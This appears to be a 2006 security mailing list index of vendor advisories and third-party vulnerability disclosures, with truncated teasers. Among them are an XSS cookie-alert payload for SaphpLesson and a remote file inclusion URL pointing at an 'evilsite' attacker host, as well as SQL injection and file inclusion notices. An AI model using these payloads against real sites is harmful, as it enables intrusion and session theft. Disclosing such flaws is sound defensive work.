[Updated] [FLSA-2006:186277] Updated sendmail packages fix security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:184098] Updated libc-client packages fixes security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:184074] Updated pine package fixes security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

Sire 2.0 Nws Remote File inclusion & Arbitrary Files Upload
2006-04-07 simo64 gmail com
by Moroccan Security Team
Greetz To All Friend
[+]File Inclusion:
Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files
Successful exploitation requires that "register_globals" is enabled.
[lire.php code]
<?
73 if(empty($_GET["rub

[FLSA-2006:180159] Updated unzip package fixes security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:183571-2] Updated tar package fixes security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[eVuln] Null news SQL Injection Vulnerability
2006-04-08 alex evuln com
New eVuln Advisory:
Null news SQL Injection Vulnerability
http://evuln.com/vulns/109/summary.html
--------------------Summary----------------
eVuln ID: EV0109
CVE: CVE-2006-1534
Software: Null news
Software's Web Site: http://nullbranded.tk/
Versions: 2005.07.27
Critical Level: Moderate
Type: SQL I

[FLSA-2006:183571-1] Updated tar package fixes security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:170411] Updated imap packages fix security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:156290] Updated cyrus-imapd packages fix security issues
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

Xss In SaphpLesson3.0
2006-04-07 w3 _ hotmail com
Software: SaphpLesson
Web Site: http://www.arabless.com
Versions:3.0
POWERED BY: SaphpLesson3.0
Type: Xss
Enter http://www.xxx.com/xxx/search.php and search :
<Script>alert(document.cookie)</Script>

[FLSA-2006:156139] Updated tcpdump packages fix security issues
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

[SECURITY] [DSA 946-2] New sudo packages fix privilege escalation
2006-04-08 joey infodrom org (Martin Schulze)

[SECURITY] [DSA 1031-1] New cacti packages fix several vulnerabilities
2006-04-08 joey infodrom org (Martin Schulze)

Autonomous LAN party File iNclusion
2006-04-08 codexploder linuxmail org
Autonomous LAN party File iNclusion
--------------------------------------------
Site:http://www.nerdclub.net/alp/
Demo:http://www.redfiles.net/cup/credits.php
--------------------------------------------
Example:
http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite
------

[ MDKSA-2006:066 ] - Updated FreeRADIUS packages fix off-by-one overflow vulnerability
2006-04-05 security mandriva com

Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer and server
2006-04-05 Luigi Auriemma (aluigi autistici org)
jalvare7 (at) cajastur (dot) es wrote:
> Could you confirm my impression that the server vulnerability can only
> overflow the buffer in 3 bytes?
Yes, the buffer is overflowed just by those 3 bytes plus the Windows error message created with FormatMessage().
> Is there a way to exploit this for code execut

[FLSA-2006:152896] Updated mod_python package fixes a security issue
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability
2006-04-05 Cisco Systems Product Security Incident Response Team (psirt cisco com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability
Advisory ID: cisco-sa-20060405-css
http://www.cisco.com/warp/public/707/cisco-sa-20060405-css.shtml
Revision 1.0
For Public Release 2006 April 05 1500 GMT (UTC)

[SECURITY] [DSA 1024-1] New clamav packages fix several vulnerabilities
2006-04-05 Moritz Muehlenhoff (jmm debian org)

[SECURITY] [DSA 1018-2] New Linux kernel 2.4.27 packages fix several vulnerabilities
2006-04-05 Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 1018-2 security (at) debian (dot) org
http://www.debian.org/security/ Dann Frazier, Simon Horman
April 5th, 2006

Re: recursive DNS servers DDoS as a growing DDoS problem
2006-04-05 Anton Ivanov (arivanov sigsegv cx)

[FLSA-2006:152873] Updated xine package fixes security issues
2006-04-05 Marc Deslauriers (marcdeslauriers videotron ca)

Linux Kernel Local DoS vulnerability.
2006-04-04 fingerout (fingerout gmail com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello.
I'd like to present one of Linux Kernel vulnerabilities. As far as I know, this one affects 2.6.x kernels.
Problem
- --
The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c. Each time user creates a posix timer, some kernel mem

phpNewsManager Multiple SQL Injections
http://evuln.com/vulns/110/summary.html
--------------------Summary----------------
eVuln ID: EV0110
CVE: CVE-2006-1560
Vendor: SkinTech Group
Vendor's Web Site: http://www.skintech.org/
Software: phpNewsManager
Versions: 1.48
Critical Leve